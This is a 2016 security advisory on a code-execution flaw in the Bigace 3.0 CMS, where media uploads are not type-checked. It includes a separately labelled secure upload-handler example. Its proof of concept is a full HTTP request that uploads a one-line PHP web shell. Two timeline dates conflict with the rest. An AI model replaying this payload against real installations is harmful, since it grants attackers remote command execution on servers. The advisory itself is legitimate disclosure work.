
Bigace 3.0: Code Execution
Date: 2016-01-28 09:55:02

1. Introduction

Affected Product: Bigace 3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.bigace.de/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 01/28/2016
Release mode: Full Disclosure
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH
2. Overview
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
Bigace is a CMS written in PHP. By default, users are separated into three groups: Anonymous, Editor, and Administrator. The Editor and Administrator roles have the permission to upload media files.
When uploading media files, there is no check to verify the type or extension of the uploaded file. This means that anyone with the permission to upload media files can gain code execution.
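The checks the description says are missing, shown as an added example (not Bigace code) of a PHP media-upload handler that enforces an extension allowlist, verifies the file content's MIME type instead of trusting the client's Content-Type, and stores the file under a random name outside the web root. The storage path, the allowlist and the error handling are assumptions; the field name userfile[] matches the advisory's request.

```php
<?php
// Added example, not Bigace code. MEDIA_DIR and ALLOWED_MEDIA are assumptions.
declare(strict_types=1);

// Allowlist: permitted extension => MIME type the file content must have.
const ALLOWED_MEDIA = [
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
    'pdf' => 'application/pdf',
];
// Outside the document root, so a stored file can be served but never executed.
const MEDIA_DIR = '/var/lib/example-cms/media';

// Validate one $_FILES-style entry (name, tmp_name, error), move it into
// MEDIA_DIR and return the final path; throws on any failed check.
function storeMediaUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    // Extension check against the allowlist (rejects .php, .phtml and similar).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_MEDIA[$ext])) {
        throw new RuntimeException("extension .$ext not allowed");
    }
    // Content check: sniff the MIME type from the bytes, ignoring the
    // client-supplied Content-Type, and require it to match the extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_MEDIA[$ext]) {
        throw new RuntimeException("content is $mime, not " . ALLOWED_MEDIA[$ext]);
    }
    // Never keep the client's filename: a random name plus the allowlisted
    // extension removes double-extension and path tricks entirely.
    $dest = MEDIA_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

// Process every file submitted in the userfile[] field.
foreach (array_keys($_FILES['userfile']['name'] ?? []) as $i) {
    $one = [];
    foreach (['name', 'tmp_name', 'error'] as $k) {
        $one[$k] = $_FILES['userfile'][$k][$i];
    }
    try {
        echo 'stored ' . storeMediaUpload($one) . "\n";
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . $e->getMessage() . "\n";
    }
}
```

Serving the stored files through a read-only handler that sets Content-Type from ALLOWED_MEDIA, rather than exposing MEDIA_DIR directly, keeps the web server from ever interpreting them.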
3. Proof of Concept
POST /bigace_3.0/public/index.php/admin/upload/process/en?hashtoken=68e499dea0cf56611efea8b2ad03d534 HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------11206764012154230101823396821
Content-Length: 1340

-----------------------------11206764012154230101823396821
Content-Disposition: form-data; name="mode"

upload
-----------------------------11206764012154230101823396821
Content-Disposition: form-data; name="userfile[]"; filename="test.php"
Content-Type: application/x-php

<?php passthru($_GET['x']);
-----------------------------11206764012154230101823396821
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------11206764012154230101823396821
Content-Disposition: form-data; name="data[name]"

-----------------------------11206764012154230101823396821
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------11206764012154230101823396821
Content-Disposition: form-data; name="data[unique_name]"

-----------------------------11206764012154230101823396821
Content-Disposition: form-data; name="data[description]"

-----------------------------11206764012154230101823396821
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------11206764012154230101823396821
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------11206764012154230101823396821
Content-Disposition: form-data; name="upload2"

Upload
-----------------------------11206764012154230101823396821--
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
11/17/2015 | Informed Vendor about Issue (no reply)
12/10/2015 | CVE Requested, but not assigned
12/10/2015 | Reminded Vendor of Disclosure Date
12/14/2015 | Vendor requests more time
01/10/2015 | Reminded Vendor of Disclosure Date
01/17/2015 | Vendor discontinued project
01/28/2016 | Disclosed to public